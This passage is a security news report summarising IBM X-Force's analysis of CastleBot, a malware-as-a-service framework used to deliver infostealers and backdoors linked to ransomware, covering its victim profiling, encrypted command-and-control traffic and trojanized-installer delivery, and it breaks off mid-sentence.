CastleBot MaaS Released Diverse Payloads in Coordinated Mass Ransomware Attacks

IBM X-Force has uncovered CastleBot, a nascent malware framework operating as a Malware-as-a-Service (MaaS) platform, enabling cybercriminals to deploy a spectrum of payloads ranging from infostealers to sophisticated backdoors implicated in ransomware operations.

First detected in early 2025 with heightened activity since May, CastleBot facilitates the delivery of threats like NetSupport and WarmCookie, which have historical ties to ransomware attacks.

This framework’s flexibility allows operators to filter victims, manage infections, and precisely target high-value assets by gathering host enumeration data such as usernames, NetBIOS names, system architecture, and unique victim IDs calculated via a linear congruential generator from volume serial numbers.

The malware’s core component communicates with command-and-control (C2) servers using ChaCha-encrypted serialized containers over HTTP, requesting tasks that can include multiple payloads in a single campaign, thereby complicating traditional detection methods.

Malware-as-a-Service Landscape

CastleBot’s infection chain begins with trojanized software installers distributed through ...